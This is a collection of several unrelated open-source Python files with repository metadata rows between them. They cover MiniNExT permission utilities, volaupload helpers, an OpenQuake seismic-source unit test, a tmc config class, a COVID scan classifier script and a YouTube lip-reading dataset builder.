# fractional hue; under Python 2 it would be integer division -- confirm.
for x in reversed(range(0, num)):
    t.fillcolor(colorsys.hsv_to_rgb(x/num, 1.0, 1.0))
    t.begin_fill()
    t.circle(5 + x, None, 11)
    square(t, 5 + x)
    t.end_fill()
    t.right(phi)
    t.right(.8)
# begin drawing
turtle.mainloop()
634f60b0c83c6e710d6ef16e4bf19157169871cf | 12,073 | py | Python | mininext/util.py | vikaskamath/miniNExT | 6dcf959eec26df50787099a3913a492ba0b35756 | [
"MIT"
] | 36 | 2015-02-02T15:02:15.000Z | 2022-01-14T22:54:58.000Z | mininext/util.py | RS1999ent/miniNExT_evolvability | 1328ea38db507598a430e9f8b547dce06a4374bb | [
"MIT"
] | 15 | 2015-02-21T09:05:13.000Z | 2021-08-31T13:04:00.000Z | mininext/util.py | RS1999ent/miniNExT_evolvability | 1328ea38db507598a430e9f8b547dce06a4374bb | [
"MIT"
] | 29 | 2015-02-27T02:33:00.000Z | 2021-11-21T12:15:31.000Z | """
Additional utilities and patches for MiniNExT.
"""
from os.path import isdir
import os
import pwd
import grp
import shutil
from mininet.util import quietRun
from mininext.mount import ObjectPermissions
# Patches #
def isShellBuiltin(cmd):
    """Return True iff cmd (or its first word) is a bash shell builtin.

    Replaces Mininet's version, which substring-matched against the raw
    output of 'bash -c enable' and so misfired on short names like 'a'.
    The builtin list is fetched once and cached on the function object.
    """
    if isShellBuiltin.builtIns is None:
        # Lazily build the cache: one builtin per output line, keeping
        # only the name after the leading 'enable ' prefix.
        isShellBuiltin.builtIns = set()
        for line in quietRun('bash -c enable').split('\n'):
            isShellBuiltin.builtIns.add(line.partition(' ')[2])
    space = cmd.find(' ')
    if space > 0:
        cmd = cmd[:space]
    return cmd in isShellBuiltin.builtIns

isShellBuiltin.builtIns = None
# Mount support / permissions management #
# Check directory/file state and permissions
def checkIsDir(path):
    """Raise an Exception unless path is an existing directory."""
    if not quietCheckIsDir(path):
        raise Exception("Path [%s] is not a valid directory" % (path))
def quietCheckIsDir(path):
    """Return whether path refers to an existing directory."""
    result = isdir(path)
    return result
def checkPath(path):
    """Raise an Exception unless something exists at path."""
    if not quietCheckPath(path):
        raise Exception("Path [%s] is not valid" % (path))
def quietCheckPath(path):
    """Return whether anything exists at path."""
    exists = os.path.exists(path)
    return exists
def createDirIfNeeded(path, perms=None, recursive=False):
    """Create a directory (optionally with ownership/mode) unless it exists.

    perms: optional permissions object giving mode and/or owner to apply.
    recursive: when True, missing parent directories are also created.
    Raises when a non-directory object already occupies path.
    """
    make = os.makedirs if recursive is True else os.mkdir
    # Nothing to do when the directory is already present.
    if os.path.isdir(path):
        return
    if not os.path.isdir(path) and os.path.exists(path):
        raise Exception("Cannot create directory, object at path %s" % (path))
    if perms is None:
        make(path)
        return
    # Resolve username/groupname into numeric ids when given.
    setUIDGID(perms)
    oldumask = os.umask(0)  # ensure the requested mode is applied verbatim
    if perms.mode is not None:
        make(path, perms.mode)
    else:
        make(path)
    # -1 leaves the corresponding ownership field unchanged in chown().
    os.chown(path,
             perms.uid if perms.uid is not None else -1,
             perms.gid if perms.gid is not None else -1)
    os.umask(oldumask)  # revert back to previous umask
def deleteDirIfExists(path):
    """Recursively remove path if it is an existing directory; no-op otherwise."""
    if not quietCheckIsDir(path):
        return
    shutil.rmtree(path)
def getUIDGID(username=None, groupname=None):
    """Resolve a username and/or groupname into numeric (uid, gid).

    Either argument may be None, in which case the matching id is None.
    Raises when a supplied name does not exist on the system.
    """
    uid = gid = None
    if username is not None:
        try:
            uid = pwd.getpwnam(username).pw_uid
        except KeyError:
            raise Exception("Expected user %s does not exist" % (username))
    if groupname is not None:
        try:
            gid = grp.getgrnam(groupname).gr_gid
        except KeyError:
            raise Exception("Expected group %s does not exist" % (groupname))
    return uid, gid
def setUIDGID(perms):
    """Fill in perms.uid/.gid from perms.username/.groupname (None-safe)."""
    perms.uid, perms.gid = getUIDGID(perms.username, perms.groupname)
def doDirPermsEqual(path, perms):
    """Raise unless the directory tree at path matches the expected perms."""
    if quietDoDirPermsEqual(path, perms):
        return
    raise Exception("Insufficient or unexpected permissions for %s "
                    "or a subdirectory / file\n"
                    "Expected user = %s, group = %s, (minimum) mode = %s"
                    % (path, perms.username,
                       perms.groupname, oct(perms.mode)))
def quietDoDirPermsEqual(path, perms):
    """Return whether path (and optionally its whole tree) matches perms."""
    # The top-level directory itself must match first.
    if doObjectPermsEqual(path, perms) is False:
        return False
    if perms.enforceRecursive is not True:
        return True
    # Walk every subdirectory and file beneath path.
    for root, dirs, files in os.walk(path):
        for entry in dirs + files:
            if doObjectPermsEqual(os.path.join(root, entry), perms) is False:
                return False
    return True
def doObjectPermsEqual(objectToCheck, perms):
    """Compare a file/dir's ownership and mode to the expected permissions.

    Fields of perms that are None are not checked.  Unless perms.strictMode
    is truthy, the mode check only requires perms.mode as a minimum (extra
    permission bits are tolerated); with strictMode set the mode must match
    exactly.  Returns True when all requested checks pass.
    """
    # Resolve username/groupname into numeric ids when given.
    setUIDGID(perms)
    permsEqual = True
    objectStat = os.stat(objectToCheck)
    if perms.uid is not None:
        permsEqual &= (objectStat.st_uid == perms.uid)
    if perms.gid is not None:
        permsEqual &= (objectStat.st_gid == perms.gid)
    if perms.mode is not None:
        # Bug fix: the original condition 'perms.strictMode is None or True'
        # was always True, so the strict (exact) branch was unreachable.
        if not perms.strictMode:
            # Lenient: every bit in perms.mode must be set (minimum mode).
            permsEqual &= (((objectStat.st_mode & 0o777) ^ perms.mode)
                           & perms.mode) == 0
        else:
            permsEqual &= (objectStat.st_mode & 0o777) == perms.mode
    return permsEqual
def getObjectPerms(objectToInspect):
    """Return an ObjectPermissions snapshot (uid, gid, mode) of a file/dir."""
    info = os.stat(objectToInspect)
    return ObjectPermissions(uid=info.st_uid, gid=info.st_gid,
                             mode=info.st_mode & 0o777)
# Create & modify directory/file state and permissions
def setDirPerms(path, perms):
    """Apply perms to path, and to its whole tree when enforceRecursive."""
    setObjectPerms(path, perms)
    if perms.enforceRecursive is not True:
        return
    for root, dirs, files in os.walk(path):
        for entry in dirs + files:
            setObjectPerms(os.path.join(root, entry), perms)
def setObjectPerms(objectPath, perms):
    """Apply the requested ownership and mode to a single file/dir.

    None fields of perms are left unchanged.  The mode is rewritten only
    when the current mode does not already satisfy the expectation (see
    doObjectPermsEqual for strict vs. minimum-mode semantics).
    """
    # Resolve username/groupname into numeric ids when given.
    setUIDGID(perms)
    uid = perms.uid
    gid = perms.gid
    if uid is None:
        uid = -1
    if gid is None:
        gid = -1
    os.chown(objectPath, uid, gid)
    # Update the mode if needed
    if perms.mode is not None:
        objectStat = os.stat(objectPath)
        # Bug fix: 'perms.strictMode is None or True' was always True, so
        # the exact-match comparison below could never run.
        if not perms.strictMode:
            modeOK = (
                ((objectStat.st_mode & 0o777) ^ perms.mode) & perms.mode) == 0
        else:
            modeOK = (objectStat.st_mode & 0o777) == perms.mode
        if modeOK is False:
            os.chmod(objectPath, perms.mode)
def copyTreeToExistingDir(src, dst, symlinks=False, ignore=None):
    """Copy everything inside src into dst, which must already exist.

    Subdirectories are copied with shutil.copytree (their destinations must
    not yet exist); plain files are copied with metadata via copy2.
    """
    for entry in os.listdir(src):
        srcPath = os.path.join(src, entry)
        dstPath = os.path.join(dst, entry)
        if os.path.isdir(srcPath):
            shutil.copytree(srcPath, dstPath, symlinks, ignore)
        else:
            shutil.copy2(srcPath, dstPath)
# Simple Objects #
# Parameter management for global and node specific parameters
class ParamContainer(object):
    """Parameter store shared by many nodes.

    Holds a set of global (service-wide) parameters plus optional per-node
    overrides -- e.g. a global service config that can vary per node.
    """

    def __init__(self, name, **params):
        """name: name of parameter container
           params: parameters to be used for global params"""
        self.name = name
        self.globalParams = {}  # parameters shared by all nodes
        self.nodeParams = {}    # node -> dict of node-specific parameters
        # Seed the globals with subclass defaults, then let the explicitly
        # passed parameters override them.
        defaultGlobalParams = self.getDefaultGlobalParams()
        if defaultGlobalParams is not None:
            self.updateGlobalParams(**defaultGlobalParams)
        self.updateGlobalParams(**params)

    # Handlers for global parameters
    def getDefaultGlobalParams(self):
        "This is filled in by derived class with default parameters"
        return None

    def updateGlobalParams(self, **kwargs):
        "Update the parameters shared by all nodes (the global parameters)"
        self.globalParams.update(kwargs)

    def getGlobalParam(self, param, **kwargs):
        """Get a service wide default parameter.

        Pass defaultValue=x to get x back when param is unset; kwargs is
        used (rather than a plain default) because None is a legal default.
        """
        if 'defaultValue' in kwargs:
            return self.globalParams.get(param, kwargs['defaultValue'])
        return self.globalParams.get(param)

    def getGlobalParams(self):
        "Get service wide default parameters"
        return self.globalParams

    # Handlers for node specific parameters
    def storeNodeParams(self, node, params, copyDefaults=False):
        """Store or update node specific service parameters.

        When copyDefaults is True the node's parameters start as a copy of
        the current globals, with params layered on top.
        """
        nodeServiceParams = {}
        if copyDefaults is True:
            nodeServiceParams = self.globalParams.copy()
        if params is not None:
            nodeServiceParams.update(params)
        # Store parameters structure for future use (uncouples from node)
        self.nodeParams[node] = nodeServiceParams

    def hasNodeParam(self, node, param):
        "Checks whether we have a parameter for a specific node"
        return param in self.getNodeParams(node)

    def hasNodeParams(self, node):
        "Checks whether we have received parameters for a specific node"
        return node in self.nodeParams

    def getNodeParam(self, node, param, **kwargs):
        """Return one parameter from the node's merged (global + node) params.

        Bug fix: kwargs is now expanded with ** when delegating; the
        original passed the kwargs dict positionally as includeGlobals,
        which silently dropped the global parameters (empty kwargs is
        falsy) and broke defaultValue propagation.
        """
        if 'defaultValue' in kwargs:
            # Return the specified defaultValue if param not set;
            # kwargs is used as defaultValue could be 'None'.
            return self.getNodeParams(node, **kwargs).get(
                param, kwargs['defaultValue'])
        return self.getNodeParams(node, **kwargs).get(param)

    def getNodeParams(self, node, includeGlobals=True, **kwargs):
        """Return the merged parameter dict for a node.

        Globals are layered first (unless includeGlobals is False), then the
        node's own parameters on top.  Raises when includeGlobals is False,
        no node parameters exist, and no defaultValue escape hatch is given.
        """
        if includeGlobals is False and node not in self.nodeParams\
                and 'defaultValue' not in kwargs:
            raise Exception('ParamContainer %s doesn\'t have params for '
                            'node %s' % (self.name, node))
        nodeServiceParams = {}
        if includeGlobals is True:
            nodeServiceParams.update(self.globalParams)
        if node in self.nodeParams:
            nodeServiceParams.update(self.nodeParams[node])
        return nodeServiceParams
| 33.350829 | 79 | 0.629173 | 3,883 | 0.321627 | 0 | 0 | 0 | 0 | 0 | 0 | 4,355 | 0.360722 |
634f8edffeec0c94f327111a1a56115127590074 | 2,575 | py | Python | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 8 | 2017-02-19T00:24:24.000Z | 2021-02-08T23:52:42.000Z | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 4 | 2015-01-19T08:09:07.000Z | 2018-09-11T21:57:06.000Z | volaupload/utils.py | RealDolos/volaupload | 9705bbc4fcd1dbc59abde092ee48dce1cb0bd3e5 | [
"MIT"
] | 2 | 2015-12-19T11:04:48.000Z | 2017-04-20T12:55:33.000Z | """ RealDolos' funky volafile upload tool"""
# pylint: disable=broad-except
import math
import re
import sys
# pylint: disable=no-name-in-module
try:
    from os import posix_fadvise, POSIX_FADV_WILLNEED
except ImportError:
    # Platform without posix_fadvise (e.g. Windows): readahead hints
    # degrade to a no-op so callers need no platform checks.
    def posix_fadvise(*args, **kw):
        """Mock implementation for systems not supporting it"""
        # Touch the arguments so linters do not flag them as unused.
        args, kw = args, kw
    POSIX_FADV_WILLNEED = 0
# pylint: enable=no-name-in-module
def natsort(val):
    """Return a list usable as a sort key for natural ("human") ordering.

    Digit runs are converted to ints so e.g. "file2" sorts before "file10".
    """
    key = []
    for token in re.split(r"(\d+)", val):
        key.append(int(token) if token.isdigit() else token)
    return key
def to_name(file):
    """Sortkey by-name: natural order on basename, then parent path."""
    def _nat(text):
        return [int(tok) if tok.isdigit() else tok
                for tok in re.split(r"(\d+)", text)]
    return _nat(file.name.casefold()), _nat(file.parent)
def to_path(file):
    """Sortkey by-path: natural order on the casefolded path string."""
    folded = file.casefold()
    return [int(tok) if tok.isdigit() else tok
            for tok in re.split(r"(\d+)", folded)]
def to_size(file):
    """Sortkey by-size: order files by their size attribute."""
    byte_size = file.size
    return byte_size
# Map of sort-mode names to their key functions.
SORTING = dict(name=to_name,
               path=to_path,
               size=to_size)
def try_unlink(file):
    """Attempt to unlink a file, or else print an error"""
    try:
        file.unlink()
    except Exception as ex:  # deliberate best-effort, see broad-except pragma
        message = "Failed to delete file after upload: {}, {}".format(file, ex)
        print(message, file=sys.stderr, flush=True)
def try_advise(file, offset, length):
    """Try to advise the OS on what file data is needed next.

    Errors (including a missing posix_fadvise) are printed, never raised.
    """
    try:
        if hasattr(file, "fileno"):
            posix_fadvise(
                file.fileno(), offset, length, POSIX_FADV_WILLNEED)
    except Exception as ex:
        print(ex, file=sys.stderr, flush=True)
def shorten(string, length):
"""Shorten a string to a specific length, cropping in the middle"""
len2 = length // 2
len3 = length - len2 - 1
lens = len(string) + 2
if lens > length:
return ("[\033[32m{}…{}\033[0m]".
format(string[:len2], string[lens - len3:]))
return ("[\033[32m{}\033[0m]{}".
format(string, " " * (length - lens)))
def progressbar(cur, tot, length):
    """Generate a progress bar"""
    filled = math.floor(cur * float(length) / tot)
    empty = length - filled
    return "[{}{}]".format("#" * filled, " " * empty)
def format_time(secs):
    """Format times for Kokytos"""
    total_minutes, s = divmod(int(secs), 60)
    total_hours, m = divmod(total_minutes, 60)
    d, h = divmod(total_hours, 24)
    if d:
        # Yes, vola is this shit :*(
        return "{}::{:02}:{:02}:{:02}".format(d, h, m, s)
    if h:
        return "{}:{:02}:{:02}".format(h, m, s)
    if m:
        return "{:02}:{:02}".format(m, s)
    return "{}s".format(s)
| 26.010101 | 74 | 0.568155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 802 | 0.311215 |
63530b2bd1708f0bb4a3378fe01c2c5c65a9b0bc | 3,801 | py | Python | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 1 | 2019-08-01T00:28:24.000Z | 2019-08-01T00:28:24.000Z | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 4 | 2018-08-31T14:14:35.000Z | 2021-10-11T12:53:13.000Z | openquake/hazardlib/tests/source/non_parametric_test.py | gfzriesgos/shakyground-lfs | 2caf67cc32e6800286eded2df1efb05973ccf41b | [
"BSD-3-Clause"
] | 3 | 2018-08-31T14:11:00.000Z | 2019-07-17T10:06:02.000Z | # The Hazard Library
# Copyright (C) 2013-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from openquake.hazardlib.source.non_parametric import \
NonParametricSeismicSource
from openquake.hazardlib.source.rupture import BaseRupture, \
NonParametricProbabilisticRupture
from openquake.hazardlib.geo import Point
from openquake.hazardlib.geo.surface.planar import PlanarSurface
from openquake.hazardlib.pmf import PMF
from openquake.hazardlib.tests import assert_pickleable
def make_non_parametric_source():
    """Build a two-rupture NonParametricSeismicSource and its kwargs.

    The first rupture sits on a north-south striking vertical plane, the
    second on an east-west one; each carries its own occurrence PMF.
    The source is verified to be pickleable before being returned.
    """
    ns_surface = PlanarSurface(
        strike=0, dip=90,
        top_left=Point(0., -1., 0.), top_right=Point(0., 1., 0.),
        bottom_right=Point(0., 1., 10.), bottom_left=Point(0., -1., 10.)
    )
    ew_surface = PlanarSurface(
        strike=90., dip=90.,
        top_left=Point(-1., 0., 0.), top_right=Point(1., 0., 0.),
        bottom_right=Point(1., 0., 10.), bottom_left=Point(-1., 0., 10.)
    )
    data = [
        (BaseRupture(mag=5., rake=90., tectonic_region_type='ASC',
                     hypocenter=Point(0., 0., 5.), surface=ns_surface),
         PMF([(0.7, 0), (0.3, 1)])),
        (BaseRupture(mag=6, rake=0, tectonic_region_type='ASC',
                     hypocenter=Point(0., 0., 5.), surface=ew_surface),
         PMF([(0.7, 0), (0.2, 1), (0.1, 2)])),
    ]
    kwargs = {
        'source_id': 'source_id', 'name': 'source name',
        'tectonic_region_type': 'tectonic region',
        'data': data
    }
    npss = NonParametricSeismicSource(**kwargs)
    assert_pickleable(npss)
    return npss, kwargs
class NonParametricSourceTestCase(unittest.TestCase):
    """Creation, iteration and counting checks for the fixture source."""

    def make_non_parametric_source(self):
        """Build the fixture and verify its attributes match the kwargs."""
        source, kwargs = make_non_parametric_source()
        for attr in kwargs:
            self.assertIs(getattr(source, attr), kwargs[attr])
        return source, kwargs

    def test_creation(self):
        self.make_non_parametric_source()

    def test_iter_ruptures(self):
        source, kwargs = self.make_non_parametric_source()
        for pos, rup in enumerate(source.iter_ruptures()):
            expected_rup, expected_pmf = kwargs['data'][pos]
            self.assertIsInstance(rup, NonParametricProbabilisticRupture)
            self.assertEqual(rup.mag, expected_rup.mag)
            self.assertEqual(rup.rake, expected_rup.rake)
            self.assertEqual(rup.tectonic_region_type,
                             source.tectonic_region_type)
            self.assertEqual(rup.hypocenter, expected_rup.hypocenter)
            self.assertIsInstance(rup.surface, PlanarSurface)
            for attr in ('strike', 'dip', 'top_left', 'top_right',
                         'bottom_right'):
                self.assertEqual(getattr(rup.surface, attr),
                                 getattr(expected_rup.surface, attr))
            numpy.testing.assert_allclose(
                rup.pmf, [prob for prob, occ in expected_pmf.data])

    def test_count_ruptures(self):
        source, _ = self.make_non_parametric_source()
        self.assertEqual(source.count_ruptures(), 2)
| 40.43617 | 78 | 0.675612 | 1,606 | 0.42252 | 0 | 0 | 0 | 0 | 0 | 0 | 806 | 0.212049 |
6353fd03f408a3e420c9272508ec8a75165d4ec5 | 2,395 | py | Python | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | tmc/config.py | jgke/tmc.py | a061d199ecce0274c1fa554fb065e13647d9862b | [
"MIT"
] | null | null | null | import os
from os import path, environ
from configparser import ConfigParser
from collections import OrderedDict
class Config(object):
    """
    This class will take care of ConfigParser and writing / reading the
    configuration.
    TODO: What to do when there are more variables to be configured? Should we
    overwrite the users config file with the updated variables if the file is
    lacking?
    """
    # Class-level placeholders; __init__ installs the real values through
    # super().__setattr__ because __setattr__ below is overridden to write
    # into the parsed configuration instead of the instance.
    config = None
    filename = ""
    defaults = None
    def __init__(self):
        """Load (or create) the config file and merge in the defaults."""
        # Config path: $TMC_CONFIGFILE if set, else ~/.config/tmc.ini
        default_path = path.join(path.expanduser("~"), ".config", "tmc.ini")
        config_filepath = environ.get("TMC_CONFIGFILE", default_path)
        # Bypass the __setattr__ override for genuine instance attributes.
        super().__setattr__('filename', config_filepath)
        super().__setattr__('config', ConfigParser())
        self._update_defaults()
        self.config["CONFIGURATION"] = {}
        for i in self.defaults:
            self.config["CONFIGURATION"][i] = str(self.defaults[i])
        if self._exists():
            self._load()
        # Always rewrite the file so newly added defaults get persisted.
        self._write()
    def _update_defaults(self):
        """Build the default option map (platform dependent)."""
        defaults = OrderedDict()
        if os.name == "nt":
            # Windows consoles handle unicode/ANSI output poorly.
            defaults["use_unicode_characters"] = False
            defaults["use_ansi_colors"] = False
        else:
            defaults["use_unicode_characters"] = True
            defaults["use_ansi_colors"] = True
        defaults["tests_show_trace"] = False
        defaults["tests_show_partial_trace"] = False
        defaults["tests_show_time"] = True
        defaults["tests_show_successful"] = True
        super().__setattr__('defaults', defaults)
    def _exists(self):
        """Return True when the configuration file already exists."""
        return path.isfile(self.filename)
    def _write(self):
        """Persist the configuration, creating its directory if needed."""
        d = os.path.dirname(self.filename)
        if not os.path.exists(d):
            os.makedirs(d)
        with open(self.filename, "w") as fp:
            self.config.write(fp)
    def _load(self):
        """Read the configuration file and warn about unknown options."""
        with open(self.filename, "r") as fp:
            self.config.read_file(fp)
        for i in self.config["CONFIGURATION"]:
            if i not in self.defaults:
                print("Warning: unknown configuration option: " + i)
    def __getattr__(self, name):
        """Resolve unknown attributes from the CONFIGURATION section."""
        # Only invoked for attributes not found normally.  Options whose
        # default is a bool are parsed via getboolean; others come back
        # as strings (or None when absent).
        if isinstance(self.defaults.get(name), bool):
            return self.config["CONFIGURATION"].getboolean(name)
        return self.config["CONFIGURATION"].get(name)
    def __setattr__(self, name, value):
        """Route every attribute assignment into the CONFIGURATION section."""
        self.config["CONFIGURATION"][name] = str(value)
| 31.513158 | 78 | 0.622547 | 2,278 | 0.951148 | 0 | 0 | 0 | 0 | 0 | 0 | 647 | 0.270146 |
635559b738e5f1db17c5a1b948064af180ddd5b4 | 819 | py | Python | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | 1 | 2020-05-20T03:47:01.000Z | 2020-05-20T03:47:01.000Z | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | null | null | null | code/main.py | RoshanTanisha/covid19 | cdea60b84b2232e84efa0803a9b633d938247590 | [
"MIT"
] | null | null | null | import h5py
import numpy as np
from code.model import UNetClassifier
def load_dataset(covid_file_path, normal_file_path):
    """Load COVID and normal scans from HDF5, label them and shuffle.

    Returns (images, labels): images with a trailing channel axis added,
    labels 1 for covid and 0 for normal, both in one shuffled order.
    """
    covid_scans = h5py.File(covid_file_path, 'r')['covid']
    normal_scans = h5py.File(normal_file_path, 'r')['normal']
    stacked = np.concatenate([covid_scans, normal_scans])
    images = np.expand_dims(stacked, axis=3)
    labels = np.concatenate([[1] * covid_scans.shape[0],
                             [0] * normal_scans.shape[0]])
    order = np.random.permutation(np.arange(images.shape[0]))
    return images[order], labels[order]
if __name__ == '__main__':
    import sys

    # Bug fixes: the import above provides UNetClassifier (the original
    # referenced an undefined ``Classifier``), and load_dataset requires
    # both dataset paths, which are now taken from the command line.
    if len(sys.argv) != 3:
        raise SystemExit('usage: python main.py <covid.h5> <normal.h5>')
    model = UNetClassifier((512, 512, 1), 2, True)
    all_images, all_labels = load_dataset(sys.argv[1], sys.argv[2])
    print(all_images.shape, all_labels.shape)
    model.train(all_images, all_labels, 15, 16, 0.2)
| 27.3 | 76 | 0.708181 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31 | 0.037851 |
6355c736188798e18f8ebe25d3c958a69c9cea68 | 54,947 | py | Python | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | 4 | 2020-07-22T16:10:55.000Z | 2021-11-25T08:32:34.000Z | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | null | null | null | main.py | openmindednewby/Tool-for-creating-lip-recognition-datasets | d8bd97cfa112e8e2fb1f4cca20a7093493e3ed9d | [
"MIT"
] | 2 | 2020-12-30T22:07:54.000Z | 2021-02-02T01:12:13.000Z | ''' Every type you encounter ##EDIT_ME## you will need to adjust these settings '''
import pandas as pd
import numpy as np
import module_youtube_extract
import module_convert_audio_to_wav
import module_process_subtitles
import module_save_variables
import module_video_processing
import module_sample_name
import module_face_detection
##EDIT_ME##
#---
# tested and work wihtought any changes to the code
INPUT_URL = 'https://www.youtube.com/watch?v=6cXdS_qVfUc'
#INPUT_URL = 'https://www.youtube.com/watch?v=v2Q3eoUldcE'
#INPUT_URL = 'https://www.youtube.com/watch?v=kayOhGRcNt4'
#INPUT_URL = 'https://www.youtube.com/watch?v=YHCZt8LeQzI&fbclid=IwAR2e436VcxEBWWnnz48W2vPU4iTfFpxgglA9U7uIOFP1XCA1sdp4h_qnmLI'
#INPUT_URL = 'https://www.youtube.com/watch?v=a1Kxhhmqt8U'
#INPUT_URL = 'https://www.youtube.com/watch?v=dRFbwjwQ4VE'
#INPUT_URL = 'https://www.youtube.com/watch?v=PpV_5-tCS-c'
#INPUT_URL = 'https://www.youtube.com/watch?v=DhYeqgufYss'
#INPUT_URL = 'https://www.youtube.com/watch?v=HqI0jbKGaT8&pbjreload=10'
#INPUT_URL = 'https://www.youtube.com/watch?v=kR-WCDa4NSc'
#INPUT_URL = 'https://www.youtube.com/watch?v=PjQ-AfRNG18'
#INPUT_URL = 'https://www.youtube.com/watch?v=PACH0XKozuU'
#INPUT_URL = 'https://www.youtube.com/watch?v=ie6lRKAdvuY'
#INPUT_URL = 'https://www.youtube.com/watch?v=w2PQEzDawMw'
#INPUT_URL = 'https://www.youtube.com/watch?v=5v-wyR5emRw'
#INPUT_URL = 'https://www.youtube.com/watch?v=MmFuWmzeiDs'
#INPUT_URL = 'https://www.youtube.com/watch?v=3obig1XeOlw'
#INPUT_URL = 'https://www.youtube.com/watch?v=Xdzo2dVqNH0'
#INPUT_URL = 'https://www.youtube.com/watch?v=m8ZUvBeKZEY'
#INPUT_URL = 'https://www.youtube.com/watch?v=uiU5GutVms4'
# settings or the code need editing
##INPUT_URL = 'https://www.youtube.com/watch?v=ZTK8XJUXqy8'
##INPUT_URL = 'https://www.youtube.com/watch?v=1mHjMNZZvFo'
##INPUT_URL = 'https://www.youtube.com/watch?v=ZO44B271tfk'
##INPUT_URL= 'https://www.youtube.com/watch?v=z0hrMg1j_d4'
##INPUT_URL= 'https://www.youtube.com/watch?v=aeT3YOYsvMs'
#---
#FILE_NAME
# download everything into a new folder: just add folder_name/file_name
# to avoid errors and extra work, make sure that the variables created do not contain special characters or spaces
#-2
# It is recommended to create the folder holding all the information for each video first, as some functions produce errors if it does not already exist.
# This generates a random string which will be assigned to the function which creates a file
# Random 3-character string used as the per-video working-folder name.
random_string_INPUT = str(module_sample_name.passw_gen(MODE=0, LENGTH=3))
# Optional
# You can specify the exact folder path or name where everything should be downloaded and stored; simply assign the directory name to random_string_INPUT
# Example
#random_string_INPUT = '/media/username/name_of_storage_device/Folder-name'
#-1
#FOLDER_PATH = str('a')
# Create the working folder (permissions '777') and keep its path.
FOLDER_PATH = module_sample_name.folder_gen(RANDOM_STRING = random_string_INPUT, FILE_PERMISION = '777')
##EDIT_ME##
# avoid special characters apart from _ and remember to add / before the actual name
# Work fine
# Video title used (after sanitization below) to build output file names.
NNAME = '/Donald Trump suspends US travel from 26 European countries but not the UK to fight coronavirus'
#NNAME = '/Moving to the UK to study Finnish Girls Experience'
#NNAME = '/Tell Me About Yourself - A Good Answer to This Interview Question'
#NNAME = '/CYPRUS the IRELAND of the MEDITERRANEAN VisualPolitik EN'
#NNAME = '/Race to become UK PM Boris Johnson exclusive interview BBC News'
#NNAME = '/Coronavirus V Last Week Tonight with John Oliver'
#NNAME = '/Trump Attacks the WHO Kellyanne Cant Count to COVID 19 The Daily Social Distancing Show'
#NNAME = '/VPNs or Virtual Private Networks as Fast As Possible'
#NNAME = '/John McAfee and the FBI Finally Face Off On CNN CNN Interview'
#NNAME = '/McAfee to CIA You Should Be Ashamed What Were You Thinking' # failed due to youtube-dl
#NNAME = '/John McAfee Im Behind Edward Snowden'
#NNAME = '/Edward Snowden I know how to keep a secret BBC News'
#NNAME = '/Coronavirus: Bill Gates interview '
#NNAME = '/Atlanta mayor Im at a loss by governors decision to reopen' # works simply there are no subtitles for this particular video
#NNAME = '/Tell Me About Yourself A Good Answer To This Interview Question'
#NNAME = '/How to Answer Tell Me About Yourself'
#NNAME = '/Ken Jeong Answers More Medical Questions From Twitter Tech Support WIRED'
#NNAME = '/body hair tips from a ballerina'
#NNAME = '/CompTIA IT Fundamentals FC0-U61 Exam Prep Intro Free Course from ITProTV'
#NNAME = '/How To Pass CompTIA Exams'
# settings or the code need editing
##NNAME = '/FACEBOOK BANS CORONAVIRUS PROTESTS'
##NNAME = '/08 common Interview question and answers Job Interview Skills'
##NNAME = '/Pence on the federal roadmap to restart the economy'
##NNAME = '/Give Donald Trump A Radio Briefings'
##NNAME = '/Trump Blames WHO and Rushes to Open Up America Again A Closer Look'
# remove any spaces if they exist in the path, as spaces there (or anywhere in the absolute directory path) may introduce errors.
# Spaces in the name may introduce errors downstream, so turn each one
# into an underscore before building the base path for all outputs.
NNAME = '_'.join(NNAME.split(' '))
INPUT_FILE_NAME = '%s%s' % (str(FOLDER_PATH), NNAME)
#0
# get a video's metadata (optional)
#meta_data = module_youtube_extract.meta_data(URL = INPUT_URL, FILE_NAME = INPUT_FILE_NAME , TXT_CLEAN=True, TXT=True, JSON=True, DOWNLOAD=False)
#1
# get all available downloadable formats
available_formats = module_youtube_extract.list_available_AV_formats(URL = INPUT_URL, CLEAN=True, LIST=True, SAVE=True, FILE_NAME = INPUT_FILE_NAME+'_down_formats')
#2 # requires a stable internet connection
# download audio-visual content. Note: some codes specified as pure video (such as code 22) have been observed to contain embedded audio as well, so a later step removes the audio explicitly.
module_youtube_extract.down_audio_video(URL = INPUT_URL, VIDEO_QUALITY_CODE=22, AUDIO_QUALITY_CODE=140 , MERGE=False, FILE_NAME = INPUT_FILE_NAME)
#7
# Convert m4a into wav file
# converts anything with the FORMAT_FROM extension in the given directory to a .wav file
